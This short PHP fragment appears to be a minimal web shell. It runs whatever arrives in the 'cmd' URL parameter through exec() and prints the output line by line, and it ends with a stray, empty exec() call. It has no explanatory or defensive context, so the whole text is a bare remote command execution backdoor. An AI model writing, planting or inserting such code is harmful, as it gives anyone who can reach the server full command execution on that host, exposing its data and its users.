exec($_GET[cmd],$exit);
foreach($exit as $line) { echo "$line
"; }

exec();